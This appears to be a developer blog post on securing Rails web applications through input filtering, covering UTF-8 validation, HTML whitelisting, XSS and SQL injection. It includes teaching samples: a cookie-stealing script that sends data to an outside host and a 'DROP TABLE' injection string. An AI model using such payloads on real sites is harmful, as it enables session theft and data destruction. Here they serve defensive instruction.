Web Security With Ingress Filtering

By Ilya Grigorik on April 27, 2007

You're under siege. You know you can fight them off, but only if the opponent doesn't get any insider information about your weak points. How do you protect yourself? Well, you could close yourself off from the world (ingress filtering), or let them in, but make sure they don't get out (egress filtering). Either strategy could work, so pick your favorite, and stick to it.

Now, I don't know about you, but I tend to prefer ingress filtering - living among friends just makes for a better environment. So why do we usually skimp on proper input filtering and verification from our users when we build our web applications? Knowing that your data is valid and in pristine condition once it enters your database significantly simplifies the overall security model. Plus, what could be more important than the security of the data your business logic operates on? It's the bread and butter of your business!

Benefits of strong ingress filtering

The ingress vs. egress data integrity policy debate is a long-standing one, so let me try to sway you to the ingress side. Here are a few direct benefits that result from proper ingress filtering:

1. No processing is required when outputting data - it's already filtered
2. You input once, but output many times - it's efficient (refer to 1)
3. There are more output vectors of attack vs. input failure points (refer to 2)
4. Directly output data from the database - simpler code (refer to 1)

To be fair, more often than not a mix of ingress and egress policies is required for any given application. However, contrary to what most developers like to believe, this is not a license to stop paying attention to your strategy - that's a perfect recipe for a compromised application. Your data is your most important asset, and you had better spend some time thinking about keeping it safe if you want to stay in business.

Common security pitfalls

I may be one of the more paranoid developers, but it's a habit I picked up the hard way. After waking up to several compromised servers, and then being forced to spend days to recover, restore, and rebuild, I've come to appreciate the value of security. Server software vulnerabilities aside (Securing your Rails Environment), I think we often overlook security in the applications we build. There is a good reason for this: lack of time and expertise. You just want to get the darn thing running, and security is an afterthought. However, these are poor excuses to stake your reputation on, and we need to change this mode of thinking fast or we're headed for trouble. The casual approach to security has got to go, and here are a few of the most common pitfalls every developer must be aware of:

Validating and filtering input at character level
Filtering HTML (read scripting)
Plugging cross-site scripting (XSS) holes
Avoiding SQL Injection attacks

Validating user input: secure UTF-8

My recent post on practicing secure UTF-8 input in Rails essentially boils down to this: UTF-8 introduces new vectors of attack that we never had to worry about before. Not every sequence of bytes is a valid UTF-8 string. Because the characters are multibyte and variable length, you had better make sure that the text you receive is, in fact, meaningful. Beyond that, you need to filter entire families (Cx) of control characters, and then make sure you serve the data correctly. In my humble opinion, you should read the post, and then check out a few resources at the bottom. It will be well worth your time.
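To make the two checks concrete, here is a minimal sketch in plain Ruby. It assumes a Ruby version with built-in string encodings (1.9 or later), and the helper names valid_utf8 and strip_control_chars are hypothetical, not taken from the original post. Keeping tabs and newlines is also an assumption; tighten the exception list if your fields should never contain them.

```ruby
# Return the text tagged as UTF-8 if the bytes form a well-formed
# UTF-8 sequence, otherwise nil. (Hypothetical helper name.)
def valid_utf8(raw)
  text = raw.dup.force_encoding(Encoding::UTF_8)
  text.valid_encoding? ? text : nil
end

# Remove every character in the Unicode "Other" category (Cc, Cf, ...),
# except tab, newline, and carriage return. (Hypothetical helper name.)
def strip_control_chars(text)
  text.gsub(/[\p{C}&&[^\t\n\r]]/, '')
end
```

Reject the request when valid_utf8 returns nil, and run strip_control_chars on whatever passes before it reaches the database.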

Filtering HTML input

Accepting HTML is a common requirement for user generated content, but it comes with an unfortunate downside of opening the application to some nasty attacks. What if the user provides the following input:

Uh oh, I'm about to steal your cookie.
<script>
   location.href = 'http://random-site.org/?stolen_cookie='+document.cookie;
</script>

To protect yourself, you need to start filtering incoming HTML content with either a whitelist or a blacklist filter. Blacklists, as their name implies, attempt to remove elements which are known to cause problems: script, onclick, style, etc. However, this is a poor strategy because it amounts to a catch-up game - you're never sure that you caught every malicious element out there. Hence, white-listing is the preferred method: allow specified tags only. In Rails, we have a great plugin to do exactly this: white_list. But here is the catch: unlike most examples we see on the web, I would argue that you should perform this filtering when you first get the data. Why? Reasons 2 and 4 for ingress filtering: (2) you input once, but output many times (it's efficient); (4) output directly from the database means simpler code and fewer worries.
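The whitelist idea can be sketched in a few lines of plain Ruby. This is not the white_list plugin's API, just an illustration under a strong assumption: only a handful of attribute-free tags are allowed. Everything is escaped first, and then only the allowed tags are restored. ALLOWED_TAGS and whitelist_html are hypothetical names.

```ruby
require 'cgi'

# Tags we are willing to let through, without any attributes.
# (Hypothetical list; adjust to your content.)
ALLOWED_TAGS = %w[b i em strong p].freeze

# Escape all markup, then restore only bare opening and closing
# tags from the whitelist. Anything else stays escaped.
def whitelist_html(input)
  escaped = CGI.escapeHTML(input)
  pattern = %r{&lt;(/?)(#{ALLOWED_TAGS.join('|')})&gt;}i
  escaped.gsub(pattern) { "<#{$1}#{$2.downcase}>" }
end
```

Because a tag carrying attributes never matches the pattern, something like an onclick handler on an otherwise allowed tag stays escaped. Run this once, when the content is first submitted, and store the result.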

Further reading: HTML Sanitization at feedparser.org

Plugging cross-site scripting (XSS) holes

XSS is a close cousin of HTML filtering. Any time you output data that is provided by the user (that is, almost always in your typical Web 2.0 app), you're opening a possible XSS hole. This is not only true for every form field on your page, but also for every URL parameter on your site! Take a look at this example:

# Template:
Hello <%= params[:user] %>!

# Request:
http://myapp.com/user/<script>alert('hello');</script>

Contrived? Perhaps, but you'll be surprised by the number of applications which will fail this trivial test. Moral of the story: treat every piece of user input as tainted. Clean everything you receive, and be religious about it. If you don't expect HTML input, then filter all tags. Regular expressions are great for this task:

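class String
  # Remove everything that smells like HTML: tags and character entities.
  def clean_xhtml
    # The entity pattern is limited to &name; and &#123; forms so that a
    # stray "&" followed by a later ";" in plain text is left alone.
    gsub(/<[^>]+>|&#?\w+;/, '')
  end
end

p "<a href='http://somewhere.com'>Hello</a>&amp; world".clean_xhtml
# prints "Hello world"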
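To be religious about it, the same cleaning can be applied to every incoming parameter in one place. A minimal sketch, assuming parameters arrive as a (possibly nested) hash of strings; strip_markup and clean_params are hypothetical helpers, and wiring them into a Rails before_filter is left out.

```ruby
# Strip tags and character entities from a single string.
# (Hypothetical helper; the regex follows the same idea as clean_xhtml.)
def strip_markup(value)
  value.gsub(/<[^>]+>|&#?\w+;/, '')
end

# Return a cleaned copy of a params-style hash. Nested hashes are
# cleaned recursively; non-string values are passed through untouched.
def clean_params(params)
  params.each_with_object({}) do |(key, value), cleaned|
    cleaned[key] = case value
                   when Hash   then clean_params(value)
                   when String then strip_markup(value)
                   else value
                   end
  end
end

params = { user: "<script>alert('hello');</script>" }
puts "Hello #{clean_params(params)[:user]}!"
```

With the request from the example above, the template would now render the text without the script tags.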

Further reading: A Web Developers guide to Cross Site Scripting (PDF)

Avoiding SQL Injection attacks

An SQL injection attack can turn out to be lethal if your attacker decides to drop a table, or even worse, the entire database (not to mention the case of stealing account information). Again, an example is in order:

# Starting query
query = "SELECT * FROM widgets WHERE id=#{params[:id]};"

# User provided input
params[:id] = "1;DROP TABLE widgets;"

# Resulting query (queries, really):
SELECT * FROM widgets WHERE id=1;DROP TABLE widgets;

A cleverly stuffed parameter turns a simple lookup query into a drop table request! It's as simple as that. To guard against this, make sure that you never, never substitute user input directly into your query without validating and escaping it first. If you're a Rails developer, memorize Chapter 43 of the Rails manual; it's a must. And here is the tip of the day: your application should never have the privilege to drop or modify the database structure. You should always perform these tasks manually. Now, I'm guilty of this myself, but I'm willing to bet that this will look strangely familiar:

production:
  adapter: mysql
  database: appName_production
  username: root    # << Oi! Fix that!
  password: myPass
  host: localhost

You should never use root logins to access your database. Instead, create a separate user with limited privileges to rein in the possible damage. If this is the only thing you take away from this post, it will be well worth your time. Here are a few queries to create a limited user:

GRANT SELECT, INSERT, UPDATE, DELETE ON MyApp.* TO "limited_user"@"127.0.0.%" IDENTIFIED BY "password1";
GRANT SELECT ON MyApp.* TO "read_only_user"@"localhost" IDENTIFIED BY "password2";
FLUSH PRIVILEGES;
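Limited privileges contain the damage, while validation keeps the stuffed parameter out of the query in the first place. Here is a minimal sketch for the widgets lookup shown earlier, assuming the id is always a base-10 integer; widget_query is a hypothetical helper, not part of Rails.

```ruby
# Build the widgets lookup only if the id is a plain base-10 integer.
# Returns nil for anything else, so the caller can reject the request.
def widget_query(raw_id)
  id = Integer(raw_id.to_s, 10) # raises ArgumentError for "1;DROP TABLE widgets;"
  "SELECT * FROM widgets WHERE id=#{id};"
rescue ArgumentError
  nil
end
```

For non-numeric values, validation alone is not enough: escape the input or let your database layer bind it as a parameter rather than interpolating it into the string.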

Further reading: SQL Injection at Unixwiz

Security is a process, not a product or a service

Let's face it: security is a process. You can't add it after the fact, nor can you buy it. In fact, if you're looking for it, then you are in trouble already. The right time to start thinking about security is now, while you don't have your reputation on the line and angry users at the door. This is not a comprehensive overview, but it's a good place to start. Be paranoid; it pays off in the long run.

Ilya Grigorik is a web ecosystem engineer, author of High Performance Browser Networking (O'Reilly), and Principal Engineer at Shopify.